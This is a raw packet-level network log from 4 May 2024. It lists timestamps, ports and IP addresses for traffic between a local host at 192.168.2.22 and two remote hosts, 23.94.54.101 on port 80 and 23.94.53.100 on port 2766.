May 4, 2024 10:02:40.028918982 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028934956 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028947115 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028955936 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.028959990 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028971910 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028981924 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.028986931 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029000998 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029007912 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.029015064 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029026985 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029041052 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029041052 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.029057026 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029064894 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.029072046 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029087067 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029097080 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.029099941 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029124975 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029125929 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.029139042 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029150963 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029164076 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029167891 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.029176950 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029190063 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029198885 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.029202938 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029216051 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029230118 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029234886 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.029242992 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029257059 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029274940 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.029277086 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029289961 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029301882 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.029303074 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029315948 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029323101 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.029329062 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029340982 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.029341936 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029357910 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029370070 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029382944 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.029383898 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029397964 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029398918 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.029412031 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029428005 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029437065 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.029442072 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029455900 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029468060 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.029469967 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029483080 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029493093 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.029503107 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029516935 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029525995 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.029555082 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.029604912 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029617071 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029629946 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029642105 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029644966 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.029654980 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029666901 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029675961 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.029681921 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029695034 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029709101 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029710054 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.029723883 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029731989 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.029737949 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029748917 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029763937 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029763937 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.029777050 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029782057 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.029791117 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029804945 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029818058 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.029819965 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029834032 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029843092 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.029846907 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029860020 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029870987 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.029874086 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029887915 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029896021 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.029901981 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029915094 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029926062 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.029928923 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029944897 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029951096 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.029958010 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029970884 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029983997 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.029987097 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.029998064 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.030010939 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.030021906 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.030024052 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.030038118 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.030045033 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.030052900 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.030069113 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.030081987 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.030081987 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.030095100 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.030105114 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.030109882 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.030122995 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.030133963 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.030137062 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.030152082 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.030157089 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.030164003 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.030175924 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.030189037 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.030191898 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.030215025 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.031423092 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.031482935 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.041915894 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.384174109 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:05:20.003283024 CEST	49162	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:20.215370893 CEST	2766	49162	23.94.53.100	192.168.2.22
May 4, 2024 10:05:20.215581894 CEST	49162	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:20.223236084 CEST	49162	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:20.439169884 CEST	2766	49162	23.94.53.100	192.168.2.22
May 4, 2024 10:05:20.656362057 CEST	49162	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:20.867523909 CEST	2766	49162	23.94.53.100	192.168.2.22
May 4, 2024 10:05:20.871644020 CEST	49162	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:21.141464949 CEST	2766	49162	23.94.53.100	192.168.2.22
May 4, 2024 10:05:21.141571045 CEST	49162	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:21.407071114 CEST	2766	49162	23.94.53.100	192.168.2.22
May 4, 2024 10:05:21.475172997 CEST	2766	49162	23.94.53.100	192.168.2.22
May 4, 2024 10:05:21.477431059 CEST	49162	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:21.687680006 CEST	2766	49162	23.94.53.100	192.168.2.22
May 4, 2024 10:05:21.690135956 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:21.900840044 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:21.900927067 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:21.918114901 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:21.919831991 CEST	49162	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:22.133645058 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:22.419083118 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:22.629492998 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:22.644921064 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:22.907202005 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:22.907319069 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:23.125498056 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.125519991 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.125530958 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.125543118 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.125705957 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:23.125705957 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:23.336090088 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.336127043 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.336137056 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.336148977 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.336160898 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.336172104 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.336184025 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.336195946 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.336285114 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:23.339735031 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:23.546772003 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.546797991 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.546811104 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.546822071 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.546834946 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.546848059 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.546858072 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.546863079 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.546931028 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:23.549654961 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:23.549962044 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.549977064 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.549988031 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.549998999 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.550010920 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.550021887 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.550033092 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.550033092 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:23.550043106 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.550051928 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:23.550065994 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:23.760168076 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.760240078 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.760251999 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.760258913 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:23.760262966 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.760277033 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.760298014 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:23.760375977 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.760412931 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:23.762836933 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.762850046 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.762861013 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.762882948 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:23.762969017 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.762979984 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.762989998 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.763000965 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.763008118 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.763009071 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:23.763034105 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:23.763101101 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.763134956 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:23.763277054 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.763287067 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.763298035 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.763309002 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.763319016 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:23.763340950 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:23.763447046 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.763457060 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.763468027 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.763478994 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.763488054 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:23.763489962 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.763500929 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.763521910 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:23.763545036 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:23.763712883 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.763725042 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.763736010 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.763746023 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.763761997 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:23.763780117 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:23.970542908 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.970566988 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.970577002 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.970583916 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.970597982 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.970616102 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.970628977 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.970644951 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.970699072 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.970711946 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.970710039 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:23.970730066 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.970733881 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:23.970742941 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.970747948 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:23.970755100 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:23.970772982 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:23.991288900 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:24.204166889 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.204185009 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.204199076 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.204216957 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.204230070 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.204227924 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:24.204241991 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.204256058 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.204257965 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:24.204267979 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.204277039 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:24.204281092 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.204293013 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.204303026 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:24.204310894 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.204324007 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.204327106 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:24.204359055 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:24.204386950 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.204401016 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.204412937 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.204427004 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.204440117 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.204451084 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:24.204464912 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:24.204497099 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.204510927 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.204521894 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.204534054 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.204535961 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:24.204545021 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.204562902 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:24.204587936 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.204598904 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:24.204600096 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.204612970 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.204624891 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.204637051 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:24.204638958 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.204652071 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.204664946 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:24.204664946 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.204679966 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.204687119 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:24.204713106 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:24.204766035 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.204778910 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.204790115 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.204802990 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.204813957 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.204817057 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:24.204826117 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.204835892 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:24.204838991 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.204853058 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.204862118 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:24.204864979 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.204885960 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:24.204886913 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.204900026 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.204911947 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.204922915 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:24.204926014 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.204938889 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.204951048 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.204957962 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:24.204963923 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.204971075 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:24.204977036 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.204988003 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.204998970 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:24.204999924 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.205013990 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.205027103 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:24.205034971 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:24.207701921 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:24.414644957 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.414686918 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.414701939 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.414715052 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.414726973 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.414740086 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.414750099 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:24.414752960 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.414766073 CEST	2766	49163	23.94.53.100	192.168.2.22
May 4, 2024 10:05:24.414777994 CEST	49163	2766	192.168.2.22	23.94.53.100
May 4, 2024 10:05:24.414783955 CEST	49163	2766	192.168.2.22	23.94.53.100
